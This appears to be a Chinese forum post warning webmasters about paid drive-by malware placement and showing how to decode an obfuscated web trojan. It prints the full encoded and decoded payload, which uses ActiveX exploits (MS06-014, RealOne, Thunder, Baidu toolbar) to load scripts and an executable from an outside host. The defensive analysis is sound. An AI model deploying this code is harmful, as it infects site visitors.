一般掛馬者都喜歡找圖片站,電影站,網址站等娛樂性站點...如果你技術又不太行,而又不想掛馬,那要怎么樣來識別掛馬者呢?(當然,想掙這個錢的站長例外,可以不看!)

1,如何識別掛者?

  1.1,突然一天,一個QQ加你說以高價的方式收流量(通常是100元/1萬IP,按IP的質量來算.),其他大家想都能想到,有什么廣告能值100元/1萬呢? 99%是掛馬的. 

  1.2,突然有一天,一個QQ加你說要買文字或圖片廣告,但是用要JS調用或者框架(iframe)引用代碼,以方便統計. 這種情況只要你不要掛馬,直接QQ拉黑,100%掛馬者. 我一個朋友就上了一當,對方給50元/萬IP按展示付費.最后我說你站被掛馬,他還不知道怎么回事.后來氣得哇哇叫...說要找一萬只肉雞D死那Y的.. 

  1.3,如果你不相信第2點,掛上了對方的代碼廣告,殺毒軟件并未報毒.那就請看打開網頁時的反應.如果打開網頁卡,甚至IE假死.100%有馬! 如果你裝了RealOne并沒有打補丁,打開網頁時彈一下RealOne播放器,100%有馬!

/////////////////BY 俺老虎 ()////////////////////

2,如何查找和破解加密網馬? 

  2.1,當然,我這個方法并不能破解所有加密網馬. 

  2.2,我現在隨便在網上找一個圖片站吧...(這是那位兄弟的,不好意思了,我是隨便亂找的).打開這個站卡了我一分鐘,并彈出RealOne.確定有馬,那我就來解剖它,把馬找出來吧. 

    2.2.1,查看源碼,按Ctrl+F搜索"iframe",沒有找到內容.那就能肯定站長不是用框架來掛的了,那繼續查找"script" 這下找到這么一句<SCRIPT language=javascript src="admin/js/top.js"></SCRIPT>.網馬可能就掛在這里面,我們下載它.發現其內容如下:document.writeln("<iframe src=http:////www.iceak.net//dl19.htm?001 width=1 height=1><//iframe>"); 果不其然.... 

    2.2.2,把框架的長和寬都設置成1不想讓人看見啊?繼續打開..查看源碼,里面還是一個框架~<iframe src=news.html width=100 height=0></iframe> 

    2.2.3,繼續打開..這下內容出來了...我還以為你要藏10層呢...內容如下:
<script>window.onerror=function(){return true;}</script>
<script>
window.defaultStatus="完成";
eval("/151/146/50/144/157/143/165/155/145/156/164/56/143/157/157/153/151/145/56/151/156/144/145/170/117/146/50/47/117/113/47/51/75/75/55/61/51/173/15/12/164/162/171/173/166/141/162/40/145/145/145/145/145/145/145/145/73/15/12/166/141/162/40/144/163/142/75/42/113/141/163/160/145/162/163/153/171/42/73/15/12/166/141/162/40/141/144/157/75/50/144/157/143/165/155/145/156/164/56/143/162/145/141/164/145/105/154/145/155/145/156/164/50/42/134/170/66/146/134/170/66/62/134/170/66/141/134/170/66/65/134/170/66/63/134/170/67/64/42/51/51/73/15/12/166/141/162/40/122/151/163/151/156/147/75/42/134/170/66/63/134/170/66/143/134/170/66/61/134/170/67/63/134/170/67/63/134/170/66/71/134/170/66/64/42/73/15/12/166/141/162/40/113/126/62/60/60/70/75/42/134/170/64/61/134/170/66/64/134/170/66/146/134/170/66/64/134/170/66/62/134/170/62/145/134/170/65/63/134/170/67/64/134/170/67/62/134/170/66/65/134/170/66/61/134/170/66/144/42/73/15/12/166/141/162/40/113/141/163/160/145/162/163/153/171/75/42/134/170/66/63/134/170/66/143/134/170/67/63/134/170/66/71/134/170/66/64/134/170/63/141/134/170/64/62/134/170/64/64/134/170/63/71/134/170/63/66/134/170/64/63/134/170/63/65/134/170/63/65/134/170/63/66/134/170/62/144/134/170/63/66/134/170/63/65/134/170/64/61/134/170/63/63/134/170/62/144/134/170/63/61/134/170/63/61/134/170/64/64/134/170/63/60/134/170/62/144/134/170/63/71/134/170/63/70/134/170/63/63/134/170/64/61/134/170/62/144/134/170/63/60/134/170/63/60/134/170/64/63/134/170/63/60/134/170/63/64/134/170/64/66/134/170/64/63/134/170/63/62/134/170/63/71/134/170/64/65/134/170/63/63/134/170/63/66/42/73/15/12/141/144/157/56/163/145/164/101/164/164/162/151/142/165/164/145/50/122/151/163/151/156/147/54/113/141/163/160/145/162/163/153/171/51/73/15/12/166/141/162/40/141/163/75/141/144/157/56/143/162/145/141/164/145/157/142/152/145/143/164/50/113/126/62/60/60/70/54/42/42/51/175/15/12/143/141/164/143/150/50/145/145/145/145/145/145/145/145/51/173/175/73/15/12/146/151/156/141/154/154/171/173/15/12/166/141/162/40/145/170/160/151/162/145/163/75/156/145/167/40/104/141/164/145/50/51/73/15/12/145/170/160/151/162/145/163/56/163/145/164/124/151/155/145/50/145/170/160/151/162/145/163/56/147/145/164/124/151/155/145/50/51/53/63/52/66/60/52/66/60/52/61/60/60/60/51/73/15/12/144/157/143/165/155/145/156/164/56/143/157/157/153/151/145/75/47/117/113/75/131/145/163/73/160/141/164/150/75/57/73/145/170/160/151/162/145/163/75/47/53/145/170/160/151/162/145/163/56/164/157/107/115/124/123/164/162/151/156/147/50/51/73/15/12/151/146/50/145/145/145/145/145/145/145/145/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/42/74/163/143/162/151/160/164/40/163/162/143/75/150/164/164/160/72/134/57/134/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/134/57/155/163/60/66/60/61/64/56/152/163/76/74/134/57/163/143/162/151/160/164/76/42/51/175/15/12/145/154/163/145/173/15/12/164/162/171/173/166/141/162/40/146/146/146/146/146/146/146/146/73/15/12/166/141/162/40/157/165/162/147/141/155/145/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/134/170/64/67/134/170/64/143/134/170/64/63/134/170/64/70/134/170/64/61/134/170/65/64/134/170/62/145/134/170/64/67/134/170/64/143/134/170/64/63/134/170/66/70/134/170/66/61/134/170/67/64/134/170/64/63/134/170/67/64/134/170/67/62/134/170/66/143/134/170/62/145/134/170/63/61/42/51/73/175/15/12/143/141/164/143/150/50/146/146/146/146/146/146/146/146/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/146/146/146/146/146/146/146/146/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/57/107/114/127/117/122/114/104/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/147/147/147/147/147/147/147/147/73/15/12/166/141/162/40/163/164/157/162/155/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/134/170/64/144/134/170/65/60/134/170/65/63/134/170/62/145/134/170/65/63/134/170/67/64/134/170/66/146/134/170/67/62/134/170/66/144/134/170/65/60/134/170/66/143/134/170/66/61/134/170/67/71/134/170/66/65/134/170/67/62/42/51/73/175/15/12/143/141/164/143/150/50/147/147/147/147/147/147/147/147/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/147/147/147/147/147/147/147/147/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/57/123/164/157/162/155/111/111/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/150/150/150/150/150/150/150/150/73/15/12/166/141/162/40/122/145/141/154/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/134/170/64/71/134/170/64/65/134/170/65/62/134/170/65/60/134/170/64/63/134/170/67/64/134/170/66/143/134/170/62/145/134/170/64/71/134/170/64/65/134/170/65/62/134/170/65/60/134/170/64/63/134/170/67/64/134/170/66/143/134/170/62/145/134/170/63/61/42/51/73/175/15/12/143/141/164/143/150/50/150/150/150/150/150/150/150/150/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/150/150/150/150/150/150/150/150/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/163/103/162/111/160/124/40/114/101/156/107/165/101/147/105/75/42/152/101/166/101/163/103/162/111/160/124/42/40/163/162/143/75/150/164/164/160/72/134/57/134/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/134/57/162/145/141/154/56/152/163/76/74/134/57/163/143/162/151/160/164/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/151/151/151/151/151/151/151/151/73/15/12/166/141/162/40/164/150/165/156/144/145/162/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/134/170/64/64/134/170/65/60/134/170/64/63/134/170/66/143/134/170/66/71/134/170/66/65/134/170/66/145/134/170/67/64/134/170/62/145/134/170/65/66/134/170/66/146/134/170/66/64/42/51/73/175/15/12/143/141/164/143/150/50/151/151/151/151/151/151/151/151/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/151/151/151/151/151/151/151/151/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/144/157/143/165/155/145/156/164/56/167/162/151/164/145/50/47/74/151/146/162/141/155/145/40/163/164/171/154/145/75/144/151/163/160/154/141/171/72/156/157/156/145/40/163/162/143/75/42/150/164/164/160/72/57/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/57/124/150/165/156/144/145/162/56/150/164/155/154/42/76/74/57/151/146/162/141/155/145/76/47/51/175/175/15/12/164/162/171/173/166/141/162/40/153/153/153/153/153/153/153/153/73/15/12/166/141/162/40/102/141/151/144/165/75/156/145/167/40/101/143/164/151/166/145/130/117/142/152/145/143/164/50/42/134/170/64/62/134/170/66/61/134/170/66/71/134/170/66/64/134/170/67/65/134/170/64/62/134/170/66/61/134/170/67/62/134/170/62/145/134/170/65/64/134/170/66/146/134/170/66/146/134/170/66/143/42/51/73/175/15/12/143/141/164/143/150/50/153/153/153/153/153/153/153/153/51/173/175/73/15/12/146/151/156/141/154/154/171/173/151/146/50/153/153/153/153/153/153/153/153/41/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/173/15/12/102/141/151/144/165/133/42/134/170/64/64/134/170/66/143/134/170/66/146/134/170/66/61/134/170/66/64/42/53/42/134/170/64/64/134/170/65/63/42/135/50/42/150/164/164/160/72/57/57/165/163/145/162/63/56/61/141/62/142/63/143/60/56/156/145/164/57/102/141/151/144/165/56/143/141/142/42/54/40/42/134/170/64/62/134/170/66/61/134/170/66/71/134/170/66/64/134/170/67/65/134/170/62/145/134/170/66/65/134/170/67/70/134/170/66/65/42/54/40/60/51/175/175/15/12/151/146/50/146/146/146/146/146/146/146/146/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/147/147/147/147/147/147/147/147/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/150/150/150/150/150/150/150/150/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/40/46/46/40/151/151/151/151/151/151/151/151/75/75/42/133/157/142/152/145/143/164/40/105/162/162/157/162/135/42/51/15/12/173/15/12/154/157/143/141/164/151/157/156/56/162/145/160/154/141/143/145/50/42/141/142/157/165/164/72/142/154/141/156/153/42/51/73/175/15/12/175/175/175")
</script> 

    2.2.4,能看懂的就不說了,不能看懂就是加過密成8進制的網頁木馬的內容了.那要怎么知道它到底在干些啥呢?下一步! 

 2.3,在得到以上加密內容后按下面操作,就可以得到它的加密內容了. 

    2.3.1,自己新建一個A.HTML,其內容如下:
<script>
document.write("<textarea cols=55 rows=10>"+ " 填上以上所有在eval里看不懂的8進制數 " +"</textarea>");
</script> 

    2.3.2,保存以上內容后,在瀏覽器里打開A.HTML,這個木馬就是以下內容:

if(document.cookie.indexOf('OK')==-1){
try{var eeeeeeee;
var dsb="Kaspersky";
var ado=(document.createElement("/x6f/x62/x6a/x65/x63/x74"));
var Rising="/x63/x6c/x61/x73/x73/x69/x64";
var KV2008="/x41/x64/x6f/x64/x62/x2e/x53/x74/x72/x65/x61/x6d";
var Kaspersky="/x63/x6c/x73/x69/x64/x3a/x42/x44/x39/x36/x43/x35/x35/x36/x2d/x36/x35/x41/x33/x2d/x31/x31/x44/x30/x2d/x39/x38/x33/x41/x2d/x30/x30/x43/x30/x34/x46/x43/x32/x39/x45/x33/x36";
ado.setAttribute(Rising,Kaspersky);
var as=ado.createobject(KV2008,"")}
catch(eeeeeeee){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+3*60*60*1000);
document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();
if(eeeeeeee!="[object Error]"){
document.write("<script src=http:////user3.1a2b3c0.net//ms06014.js><//script>")}
else{
try{var ffffffff;
var ourgame=new ActiveXObject("/x47/x4c/x43/x48/x41/x54/x2e/x47/x4c/x43/x68/x61/x74/x43/x74/x72/x6c/x2e/x31");}
catch(ffffffff){};
finally{if(ffffffff!="[object Error]"){
document.write('<iframe style=display:none src=";')}}
try{var gggggggg;
var storm=new ActiveXObject("/x4d/x50/x53/x2e/x53/x74/x6f/x72/x6d/x50/x6c/x61/x79/x65/x72");}
catch(gggggggg){};
finally{if(gggggggg!="[object Error]"){
document.write('<iframe style=display:none src=";')}}
try{var hhhhhhhh;
var Real=new ActiveXObject("/x49/x45/x52/x50/x43/x74/x6c/x2e/x49/x45/x52/x50/x43/x74/x6c/x2e/x31");}
catch(hhhhhhhh){};
finally{if(hhhhhhhh!="[object Error]"){
document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:////user3.1a2b3c0.net//real.js><//script>')}}
try{var iiiiiiii;
var thunder=new ActiveXObject("/x44/x50/x43/x6c/x69/x65/x6e/x74/x2e/x56/x6f/x64");}
catch(iiiiiiii){};
finally{if(iiiiiiii!="[object Error]"){
document.write('<iframe style=display:none src=";')}}
try{var kkkkkkkk;
var Baidu=new ActiveXObject("/x42/x61/x69/x64/x75/x42/x61/x72/x2e/x54/x6f/x6f/x6c");}
catch(kkkkkkkk){};
finally{if(kkkkkkkk!="[object Error]"){
Baidu["/x44/x6c/x6f/x61/x64"+"/x44/x53"](";, "/x42/x61/x69/x64/x75/x2e/x65/x78/x65", 0)}}
if(ffffffff=="[object Error]" && gggggggg=="[object Error]" && hhhhhhhh=="[object Error]" && iiiiiiii=="[object Error]")
{
location.replace("about:blank");}
}}} 

    2.3.3,里面還有一些比如"/x47/x4c/x43/x48/x41/x54/x2e/x47/"的16六進制數,也可以按上面的步驟得到真實的數據. 看看這個馬,我也不再打算再深挖下去了,可以看出這是個組合網馬,包含MS06014網馬,RealOne網馬,迅雷網馬等...總之就是要利用一切可能的漏洞讓你下載木馬或插件. 

    2.3.4,這方法還可以幫你去偷別個的VIP網馬,不過本方法只適合于數制轉換加密,有的網馬用的自己的加秘函數,不過也是有辦法破解的...因為無論再怎么加密只是讓人看不懂,機器總會看得懂的...所以要破解這樣的加密方式也很簡單,把對應的一個Return改成document.write也一樣能看到本來面目... 

    最后,此文一發,勢必會引起很多人的反感...我是否有罪呢?也許吧!斷了別人的財路,確也不該. 但是如果站長不再掛毒了,網民看網頁不再怕了,上網就是等于QQ的時代也就過去了,更多的人上網是來看翻網頁的,那我們站長的錢路不就更寬了嗎? 想想也算是為了中國互聯網天空更加純凈出了微乎其微的一份力吧...